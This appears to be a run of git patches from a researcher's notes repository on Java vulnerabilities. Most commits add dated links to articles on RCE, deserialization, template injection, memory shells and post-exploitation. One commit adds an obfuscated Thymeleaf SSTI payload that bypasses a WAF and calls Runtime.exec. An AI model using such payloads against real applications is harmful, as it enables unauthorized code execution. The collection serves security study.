From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Fri, 11 Nov 2022 22:14:44 +0800
Subject: [PATCH 116/257] Create CVE-2022-42252.md
---
tomcat/Smuggling/CVE-2022-42252.md | 3 +++
1 file changed, 3 insertions(+)
create mode 100644 tomcat/Smuggling/CVE-2022-42252.md
diff --git a/tomcat/Smuggling/CVE-2022-42252.md b/tomcat/Smuggling/CVE-2022-42252.md
new file mode 100644
index 0000000..5430463
--- /dev/null
+++ b/tomcat/Smuggling/CVE-2022-42252.md
@@ -0,0 +1,3 @@
+https://www.xujun.org/note-154484.html
+
+
From a392d241bbc1fefb6197ebdced6b47fe756aa16b Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sun, 13 Nov 2022 02:01:59 +0800
Subject: [PATCH 117/257] Update Readme.md
---
.../Velocity/Readme.md" | 5 +++++
1 file changed, 5 insertions(+)
diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md"
index f6c05c2..9c7d898 100644
--- "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md"
+++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md"
@@ -4,3 +4,8 @@ Confluence CVE-2019-3396
Jira CVE-2019-11581
+框架中的利用:
+
+https://xz.aliyun.com/t/11832
+
+配合了fastjson 反序列化生成对象之后调用方法
From 6128099756ad6c518f98e7908731b72dcd2b4a70 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sat, 19 Nov 2022 18:16:19 +0800
Subject: [PATCH 118/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 3622e3f..225f958 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -199,3 +199,4 @@
+ 2022/11/10 [Druid远程代码执行漏洞分析(CVE-2021-25646)](https://xz.aliyun.com/t/9229) **简单的说就是使用@JacksonInject注解的时候,可以通过""去匹配参数从而控制值。该漏洞是控制了config 为 true.最后漏洞的利用点就是利用config为true之后绕过了对于config的检查**
+ 2022/11/11 [从SPI机制到JDBC后门实现](https://mp.weixin.qq.com/s/vhKWEz9hwhdinm4TEtLUqw)
+ 2022/11/11 [一起通过Navicat进行供应链攻击的样本分析](https://mp.weixin.qq.com/s?__biz=MzU0MDg1NjMyNQ==&mid=2247485330&idx=1&sn=ad68b1301c9289bc9ebc39640e03315e&chksm=fb339ef8cc4417ee9a047850e999f7db51ebe601b5c6a37cf247f4f17eac1481ec5147f9b5b2&mpshare=1&scene=1&srcid=11117c2tOWqevk7sw3mH7cHO&sharer_sharetime=1668165218192&sharer_shareid=33fdea7abe6be586e131951d667ccd06&key=13199a1408fc416798bb4b4f4fb6a44ff1bd702c2e1d10d0b2b72bfe4b80d53346ab688dc13c8f6da2eb8afdc49c2508f520a4234972ec3cce0a612e7c7d25aad3b5c647e77a6040bc0181802fd86df19f36bc5a21dd8a4702aab2ed6d4a6d59fcdc1c4e6d83b07ffcbcf26f78f9f2122887dee5a5f5d5c39d03a1e27b9eca2c&ascene=1&uin=ODYyODE3NzI1&devicetype=Windows+10+x64&version=6308001f&lang=zh_CN&exportkey=n_ChQIAhIQZGY7rBoHsLsIbkHsdPBgBBLvAQIE97dBBAEAAAAAAPWyNDbyQpAAAAAOpnltbLcz9gKNyK89dVj0qe2fqlflmmc8D1eybpB9UjyEVXZxzTjhUQnmaod69dFsw2ig6d2B53zT%2FWgGY2yFadFDdL%2BDBq5jySJDOnOj4H4s5cVqKESUbZ7IUfIsfvyrM4JN6HLsUL1qF1%2BSYWIe8bD1T%2FG9Eye5Qendcd%2FZpmWeJcq7ua%2BvKZrSqWy5TnM6qGrZ9reOvJeBaQo3ZcSk%2BtxapkLHCSRkAejizHNRMYFVlCSSpBP4A6IflbjQ1kX8xDv5oLFHaz3PbQLish3WWGvAqV4ONDWG&acctmode=0&pass_ticket=uGXE0Z4fPCmC9suZxdId189%2FNtwCT5VyAktjMGr70tXhWj2mXEslo4cG4WozS3Vz&wx_header=0&fontgear=2) **好np**
++ 2022/11/19 [命令注入执行](https://0xn3va.gitbook.io/cheat-sheets/web-application/command-injection)
From fa2f01f0e301bd8a36604eed063be0a3c9424286 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sat, 19 Nov 2022 18:21:19 +0800
Subject: [PATCH 119/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 225f958..8360da3 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -200,3 +200,4 @@
+ 2022/11/11 [从SPI机制到JDBC后门实现](https://mp.weixin.qq.com/s/vhKWEz9hwhdinm4TEtLUqw)
+ 2022/11/11 [一起通过Navicat进行供应链攻击的样本分析](https://mp.weixin.qq.com/s?__biz=MzU0MDg1NjMyNQ==&mid=2247485330&idx=1&sn=ad68b1301c9289bc9ebc39640e03315e&chksm=fb339ef8cc4417ee9a047850e999f7db51ebe601b5c6a37cf247f4f17eac1481ec5147f9b5b2&mpshare=1&scene=1&srcid=11117c2tOWqevk7sw3mH7cHO&sharer_sharetime=1668165218192&sharer_shareid=33fdea7abe6be586e131951d667ccd06&key=13199a1408fc416798bb4b4f4fb6a44ff1bd702c2e1d10d0b2b72bfe4b80d53346ab688dc13c8f6da2eb8afdc49c2508f520a4234972ec3cce0a612e7c7d25aad3b5c647e77a6040bc0181802fd86df19f36bc5a21dd8a4702aab2ed6d4a6d59fcdc1c4e6d83b07ffcbcf26f78f9f2122887dee5a5f5d5c39d03a1e27b9eca2c&ascene=1&uin=ODYyODE3NzI1&devicetype=Windows+10+x64&version=6308001f&lang=zh_CN&exportkey=n_ChQIAhIQZGY7rBoHsLsIbkHsdPBgBBLvAQIE97dBBAEAAAAAAPWyNDbyQpAAAAAOpnltbLcz9gKNyK89dVj0qe2fqlflmmc8D1eybpB9UjyEVXZxzTjhUQnmaod69dFsw2ig6d2B53zT%2FWgGY2yFadFDdL%2BDBq5jySJDOnOj4H4s5cVqKESUbZ7IUfIsfvyrM4JN6HLsUL1qF1%2BSYWIe8bD1T%2FG9Eye5Qendcd%2FZpmWeJcq7ua%2BvKZrSqWy5TnM6qGrZ9reOvJeBaQo3ZcSk%2BtxapkLHCSRkAejizHNRMYFVlCSSpBP4A6IflbjQ1kX8xDv5oLFHaz3PbQLish3WWGvAqV4ONDWG&acctmode=0&pass_ticket=uGXE0Z4fPCmC9suZxdId189%2FNtwCT5VyAktjMGr70tXhWj2mXEslo4cG4WozS3Vz&wx_header=0&fontgear=2) **好np**
+ 2022/11/19 [命令注入执行](https://0xn3va.gitbook.io/cheat-sheets/web-application/command-injection)
++ 2022/11/19 [Hessian 序列化、反序列化](https://mp.weixin.qq.com/s/icYs7VjPRytt6zgXja9V-w) **学习**
From 7d54485b4ab8d17084b1ab28378258eebf095e4c Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sun, 20 Nov 2022 20:01:38 +0800
Subject: [PATCH 120/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 8360da3..2e074c2 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -201,3 +201,4 @@
+ 2022/11/11 [一起通过Navicat进行供应链攻击的样本分析](https://mp.weixin.qq.com/s?__biz=MzU0MDg1NjMyNQ==&mid=2247485330&idx=1&sn=ad68b1301c9289bc9ebc39640e03315e&chksm=fb339ef8cc4417ee9a047850e999f7db51ebe601b5c6a37cf247f4f17eac1481ec5147f9b5b2&mpshare=1&scene=1&srcid=11117c2tOWqevk7sw3mH7cHO&sharer_sharetime=1668165218192&sharer_shareid=33fdea7abe6be586e131951d667ccd06&key=13199a1408fc416798bb4b4f4fb6a44ff1bd702c2e1d10d0b2b72bfe4b80d53346ab688dc13c8f6da2eb8afdc49c2508f520a4234972ec3cce0a612e7c7d25aad3b5c647e77a6040bc0181802fd86df19f36bc5a21dd8a4702aab2ed6d4a6d59fcdc1c4e6d83b07ffcbcf26f78f9f2122887dee5a5f5d5c39d03a1e27b9eca2c&ascene=1&uin=ODYyODE3NzI1&devicetype=Windows+10+x64&version=6308001f&lang=zh_CN&exportkey=n_ChQIAhIQZGY7rBoHsLsIbkHsdPBgBBLvAQIE97dBBAEAAAAAAPWyNDbyQpAAAAAOpnltbLcz9gKNyK89dVj0qe2fqlflmmc8D1eybpB9UjyEVXZxzTjhUQnmaod69dFsw2ig6d2B53zT%2FWgGY2yFadFDdL%2BDBq5jySJDOnOj4H4s5cVqKESUbZ7IUfIsfvyrM4JN6HLsUL1qF1%2BSYWIe8bD1T%2FG9Eye5Qendcd%2FZpmWeJcq7ua%2BvKZrSqWy5TnM6qGrZ9reOvJeBaQo3ZcSk%2BtxapkLHCSRkAejizHNRMYFVlCSSpBP4A6IflbjQ1kX8xDv5oLFHaz3PbQLish3WWGvAqV4ONDWG&acctmode=0&pass_ticket=uGXE0Z4fPCmC9suZxdId189%2FNtwCT5VyAktjMGr70tXhWj2mXEslo4cG4WozS3Vz&wx_header=0&fontgear=2) **好np**
+ 2022/11/19 [命令注入执行](https://0xn3va.gitbook.io/cheat-sheets/web-application/command-injection)
+ 2022/11/19 [Hessian 序列化、反序列化](https://mp.weixin.qq.com/s/icYs7VjPRytt6zgXja9V-w) **学习**
++ 2022/11/20 [Remote Command Execution in a Bank Server](https://medium.com/@win3zz/remote-command-execution-in-a-bank-server-b213f9f42afe)
From 844dfd1d2ba34b857d20de7513f9b9d8af12fa46 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Tue, 22 Nov 2022 18:44:36 +0800
Subject: [PATCH 121/257] Update Readme.md
---
"java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md"
index 722fd77..cfc36e4 100644
--- "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md"
+++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md"
@@ -11,6 +11,7 @@
+ [Velocity模板注入](Velocity) **2021 四川省比赛省赛非攻Java logiclogic** 后缀名.vm [wp](https://mp.weixin.qq.com/s?__biz=MzI3NDEzNzIxMg==&mid=2650481832&idx=2&sn=7b092fc6e26c7d5f131b8ef7a30dc85c&chksm=f3172dbbc460a4ad99f29b445dd92873304d7c34798f977695ba775a5096a6b707106190a09f&mpshare=1&scene=23&srcid=0924Bci6wWhHifB6Y7Cmc5hl&sharer_sharetime=1632452737857&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd)
+ [beetl模板注入](Beetl)
+ [jfinalcms enjoy](jfinalcms_enjoy) **2021 字节ctf考察过。**
++ [Java FreeMarker 模板引擎注入深入分析](https://mp.weixin.qq.com/s/aYTp0suulfjQ5dcocS33Kg)
-------------------------------------------------------------------------------------------------------------------------
# SSTI
From a43731568a56fd2be95238ce312b70268ed3d834 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Wed, 23 Nov 2022 19:48:20 +0800
Subject: [PATCH 122/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 2e074c2..a2d7665 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -202,3 +202,4 @@
+ 2022/11/19 [命令注入执行](https://0xn3va.gitbook.io/cheat-sheets/web-application/command-injection)
+ 2022/11/19 [Hessian 序列化、反序列化](https://mp.weixin.qq.com/s/icYs7VjPRytt6zgXja9V-w) **学习**
+ 2022/11/20 [Remote Command Execution in a Bank Server](https://medium.com/@win3zz/remote-command-execution-in-a-bank-server-b213f9f42afe)
++ 2022/11/23 [ZK框架权限绕过导致R1Soft Server Backup Manager RCE并接管Agent](http://tttang.com/archive/1833)
From 07b6b7f7a5ab3d17fed2c347c4f2ffd8ab032c3b Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Wed, 23 Nov 2022 20:07:47 +0800
Subject: [PATCH 123/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index a2d7665..4e36434 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -202,4 +202,4 @@
+ 2022/11/19 [命令注入执行](https://0xn3va.gitbook.io/cheat-sheets/web-application/command-injection)
+ 2022/11/19 [Hessian 序列化、反序列化](https://mp.weixin.qq.com/s/icYs7VjPRytt6zgXja9V-w) **学习**
+ 2022/11/20 [Remote Command Execution in a Bank Server](https://medium.com/@win3zz/remote-command-execution-in-a-bank-server-b213f9f42afe)
-+ 2022/11/23 [ZK框架权限绕过导致R1Soft Server Backup Manager RCE并接管Agent](http://tttang.com/archive/1833)
++ 2022/11/23 [ZK框架权限绕过导致R1Soft Server Backup Manager RCE并接管Agent](http://tttang.com/archive/1833) **forward转发 bypass 权限操作**
From b3ea51bfbe450ab23aaa7623a7d2174f83fd880a Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sat, 26 Nov 2022 21:59:40 +0800
Subject: [PATCH 124/257] =?UTF-8?q?Rename=20c=E8=AF=AD=E8=A8=80=E8=83=BD?=
=?UTF-8?q?=E5=AE=9E=E7=8E=B0agent=3F!.md=20to=20c=E8=AF=AD=E8=A8=80?=
=?UTF-8?q?=E8=83=BD=E5=AE=9E=E7=8E=B0agent=E5=90=97.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...0\200\350\203\275\345\256\236\347\216\260agent\345\220\227.md" | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename "java\346\227\245\345\270\270/c\350\257\255\350\250\200\350\203\275\345\256\236\347\216\260agent?!.md" => "java\346\227\245\345\270\270/c\350\257\255\350\250\200\350\203\275\345\256\236\347\216\260agent\345\220\227.md" (100%)
diff --git "a/java\346\227\245\345\270\270/c\350\257\255\350\250\200\350\203\275\345\256\236\347\216\260agent?!.md" "b/java\346\227\245\345\270\270/c\350\257\255\350\250\200\350\203\275\345\256\236\347\216\260agent\345\220\227.md"
similarity index 100%
rename from "java\346\227\245\345\270\270/c\350\257\255\350\250\200\350\203\275\345\256\236\347\216\260agent?!.md"
rename to "java\346\227\245\345\270\270/c\350\257\255\350\250\200\350\203\275\345\256\236\347\216\260agent\345\220\227.md"
From f939b114f79692c1c31c007ddb4aa4ba8b47495c Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sun, 27 Nov 2022 11:38:32 +0800
Subject: [PATCH 125/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 4e36434..e7ea0b0 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -203,3 +203,4 @@
+ 2022/11/19 [Hessian 序列化、反序列化](https://mp.weixin.qq.com/s/icYs7VjPRytt6zgXja9V-w) **学习**
+ 2022/11/20 [Remote Command Execution in a Bank Server](https://medium.com/@win3zz/remote-command-execution-in-a-bank-server-b213f9f42afe)
+ 2022/11/23 [ZK框架权限绕过导致R1Soft Server Backup Manager RCE并接管Agent](http://tttang.com/archive/1833) **forward转发 bypass 权限操作**
++ 2022/11/27 [burp指纹修改](https://mp.weixin.qq.com/s?__biz=MzU1NTQ5MDEwNw==&mid=2247484690&idx=1&sn=5b2251069f9bcc98c340278207825c66&chksm=fbd2cb46cca542505b3f49c8ba7f609fab9d5ca6a43b6ebdc61cf67a3f725406b998b56fdbdc&mpshare=1&scene=23&srcid=1126mmkxPLOblhlehRFdhOY7&sharer_sharetime=1669485801645&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd)
From 2f4f6e6db79f31b3fadb0366806c4030a5250e29 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Wed, 30 Nov 2022 11:24:32 +0800
Subject: [PATCH 126/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index e7ea0b0..0ac1427 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -204,3 +204,4 @@
+ 2022/11/20 [Remote Command Execution in a Bank Server](https://medium.com/@win3zz/remote-command-execution-in-a-bank-server-b213f9f42afe)
+ 2022/11/23 [ZK框架权限绕过导致R1Soft Server Backup Manager RCE并接管Agent](http://tttang.com/archive/1833) **forward转发 bypass 权限操作**
+ 2022/11/27 [burp指纹修改](https://mp.weixin.qq.com/s?__biz=MzU1NTQ5MDEwNw==&mid=2247484690&idx=1&sn=5b2251069f9bcc98c340278207825c66&chksm=fbd2cb46cca542505b3f49c8ba7f609fab9d5ca6a43b6ebdc61cf67a3f725406b998b56fdbdc&mpshare=1&scene=23&srcid=1126mmkxPLOblhlehRFdhOY7&sharer_sharetime=1669485801645&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd)
++ 2022/11/30 [关于HackerOne上Grafana、jolokia、Flink攻击手法的学习](https://mp.weixin.qq.com/s/iQlLvF8LHzJvL8ofE2YvKA) **flink 寻找main 有意思**
From 817c0d4703ab013050aad47b0c88ebc302183eae Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Wed, 30 Nov 2022 20:08:26 +0800
Subject: [PATCH 127/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 0ac1427..331bb23 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -205,3 +205,4 @@
+ 2022/11/23 [ZK框架权限绕过导致R1Soft Server Backup Manager RCE并接管Agent](http://tttang.com/archive/1833) **forward转发 bypass 权限操作**
+ 2022/11/27 [burp指纹修改](https://mp.weixin.qq.com/s?__biz=MzU1NTQ5MDEwNw==&mid=2247484690&idx=1&sn=5b2251069f9bcc98c340278207825c66&chksm=fbd2cb46cca542505b3f49c8ba7f609fab9d5ca6a43b6ebdc61cf67a3f725406b998b56fdbdc&mpshare=1&scene=23&srcid=1126mmkxPLOblhlehRFdhOY7&sharer_sharetime=1669485801645&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd)
+ 2022/11/30 [关于HackerOne上Grafana、jolokia、Flink攻击手法的学习](https://mp.weixin.qq.com/s/iQlLvF8LHzJvL8ofE2YvKA) **flink 寻找main 有意思**
++ 2022/11/30 [内存马的攻防博弈之旅之gRPC内存马](https://mp.weixin.qq.com/s/osuoinwCpOwNM4WoI6SOnQ) **可能之后可以用**
From 7ce6d3e9d7f78cf86bda961d7f7f903f857536ea Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Fri, 2 Dec 2022 16:25:37 +0800
Subject: [PATCH 128/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 331bb23..dc792f6 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -206,3 +206,4 @@
+ 2022/11/27 [burp指纹修改](https://mp.weixin.qq.com/s?__biz=MzU1NTQ5MDEwNw==&mid=2247484690&idx=1&sn=5b2251069f9bcc98c340278207825c66&chksm=fbd2cb46cca542505b3f49c8ba7f609fab9d5ca6a43b6ebdc61cf67a3f725406b998b56fdbdc&mpshare=1&scene=23&srcid=1126mmkxPLOblhlehRFdhOY7&sharer_sharetime=1669485801645&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd)
+ 2022/11/30 [关于HackerOne上Grafana、jolokia、Flink攻击手法的学习](https://mp.weixin.qq.com/s/iQlLvF8LHzJvL8ofE2YvKA) **flink 寻找main 有意思**
+ 2022/11/30 [内存马的攻防博弈之旅之gRPC内存马](https://mp.weixin.qq.com/s/osuoinwCpOwNM4WoI6SOnQ) **可能之后可以用**
++ 2022/12/02 [一次失败的定点漏洞挖掘之代码审计宜信Davinci](https://www.cnblogs.com/r00tuser/p/13265435.html) **遇到了 但是不出网**
From 338a056bcaeba8ae2c391831d012ff2b9fdfd84c Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sat, 3 Dec 2022 00:30:14 +0800
Subject: [PATCH 129/257] Update README.md
---
Struts2/README.md | 5 +++++
1 file changed, 5 insertions(+)
diff --git a/Struts2/README.md b/Struts2/README.md
index bbe2332..5f8b882 100644
--- a/Struts2/README.md
+++ b/Struts2/README.md
@@ -19,3 +19,8 @@
[漏洞版本](http://archive.apache.org/dist/struts/binaries/)
+
+## TODO
+分析各个s2 漏洞
+s2-62 和新的 [https://mc0wn.blogspot.com/2022/11/rce-on-apache-struts-2530.html](https://mc0wn.blogspot.com/2022/11/rce-on-apache-struts-2530.html)
+
From 8de7d2f2d33c9801e8fb01e3d326b78526e214e3 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Mon, 5 Dec 2022 00:16:13 +0800
Subject: [PATCH 130/257] Create Readme.md
---
.../Thymeleaf/Readme.md" | 8 ++++++++
1 file changed, 8 insertions(+)
create mode 100644 "java\346\250\241\346\235\277\346\263\250\345\205\245/Thymeleaf/Readme.md"
diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Thymeleaf/Readme.md" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Thymeleaf/Readme.md"
new file mode 100644
index 0000000..1f606b5
--- /dev/null
+++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Thymeleaf/Readme.md"
@@ -0,0 +1,8 @@
+# 绕过文章
+
+
++ [记一次实战之若依SSTI注入绕过玄某盾](https://mp.weixin.qq.com/s/7TCZDkfCXlmEhcTb85fw_Q)
+
+```java
+__${T%20(%0aRuntime%09).%0dgetRuntime%0a(%09)%0d.%00exec('calc')}__::.x
+```
From 94ac544cfcfe4ff50f04d4e3bdcf9ca03002fde4 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Mon, 5 Dec 2022 18:45:41 +0800
Subject: [PATCH 131/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index dc792f6..2cab2d8 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -207,3 +207,4 @@
+ 2022/11/30 [关于HackerOne上Grafana、jolokia、Flink攻击手法的学习](https://mp.weixin.qq.com/s/iQlLvF8LHzJvL8ofE2YvKA) **flink 寻找main 有意思**
+ 2022/11/30 [内存马的攻防博弈之旅之gRPC内存马](https://mp.weixin.qq.com/s/osuoinwCpOwNM4WoI6SOnQ) **可能之后可以用**
+ 2022/12/02 [一次失败的定点漏洞挖掘之代码审计宜信Davinci](https://www.cnblogs.com/r00tuser/p/13265435.html) **遇到了 但是不出网**
++ 2022/12/05 [宝塔后渗透-添加用户|反弹shell](https://mp.weixin.qq.com/s/2o_H66BMqy3Ft3-5ERlKpQ) **后渗透比较重要**
From bfd1c0166adf388ec31c6f465aacc5452e1aa36b Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Mon, 5 Dec 2022 18:58:16 +0800
Subject: [PATCH 132/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 2cab2d8..7ad6d0f 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -208,3 +208,4 @@
+ 2022/11/30 [内存马的攻防博弈之旅之gRPC内存马](https://mp.weixin.qq.com/s/osuoinwCpOwNM4WoI6SOnQ) **可能之后可以用**
+ 2022/12/02 [一次失败的定点漏洞挖掘之代码审计宜信Davinci](https://www.cnblogs.com/r00tuser/p/13265435.html) **遇到了 但是不出网**
+ 2022/12/05 [宝塔后渗透-添加用户|反弹shell](https://mp.weixin.qq.com/s/2o_H66BMqy3Ft3-5ERlKpQ) **后渗透比较重要**
++ 2022/12/05 [Nacos Client Yaml反序列化漏洞分析](https://xz.aliyun.com/t/10355) [Nacos 未授权远程代码执行漏洞通告](https://mp.weixin.qq.com/s/Zpa3af43XZECglYMbNRk8g) **add user有用**
From 9d5838edce77f1baeadcc64c5367dc501fbcf4e5 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Thu, 8 Dec 2022 20:06:46 +0800
Subject: [PATCH 133/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 7ad6d0f..b72f4c4 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -209,3 +209,4 @@
+ 2022/12/02 [一次失败的定点漏洞挖掘之代码审计宜信Davinci](https://www.cnblogs.com/r00tuser/p/13265435.html) **遇到了 但是不出网**
+ 2022/12/05 [宝塔后渗透-添加用户|反弹shell](https://mp.weixin.qq.com/s/2o_H66BMqy3Ft3-5ERlKpQ) **后渗透比较重要**
+ 2022/12/05 [Nacos Client Yaml反序列化漏洞分析](https://xz.aliyun.com/t/10355) [Nacos 未授权远程代码执行漏洞通告](https://mp.weixin.qq.com/s/Zpa3af43XZECglYMbNRk8g) **add user有用**
++ 2022/12/08 [CVE-2022-44262](https://github.com/ff4j/ff4j/issues/624) **需要找到构造方法并且是string类型的利用**
From b541642076316d86f83af6f6d42f488f1c764b32 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Thu, 8 Dec 2022 20:11:14 +0800
Subject: [PATCH 134/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index b72f4c4..0f0f613 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -210,3 +210,4 @@
+ 2022/12/05 [宝塔后渗透-添加用户|反弹shell](https://mp.weixin.qq.com/s/2o_H66BMqy3Ft3-5ERlKpQ) **后渗透比较重要**
+ 2022/12/05 [Nacos Client Yaml反序列化漏洞分析](https://xz.aliyun.com/t/10355) [Nacos 未授权远程代码执行漏洞通告](https://mp.weixin.qq.com/s/Zpa3af43XZECglYMbNRk8g) **add user有用**
+ 2022/12/08 [CVE-2022-44262](https://github.com/ff4j/ff4j/issues/624) **需要找到构造方法并且是string类型的利用**
++ 2022/12/08 [RCE on Apache Struts 2.5.30](https://mc0wn.blogspot.com/2022/11/rce-on-apache-struts-2530.html) **np s2的利用**
From 85c348b0513fe1f99d7973ed586e888e091229f9 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Fri, 9 Dec 2022 15:59:18 +0800
Subject: [PATCH 135/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 0f0f613..e263195 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -211,3 +211,4 @@
+ 2022/12/05 [Nacos Client Yaml反序列化漏洞分析](https://xz.aliyun.com/t/10355) [Nacos 未授权远程代码执行漏洞通告](https://mp.weixin.qq.com/s/Zpa3af43XZECglYMbNRk8g) **add user有用**
+ 2022/12/08 [CVE-2022-44262](https://github.com/ff4j/ff4j/issues/624) **需要找到构造方法并且是string类型的利用**
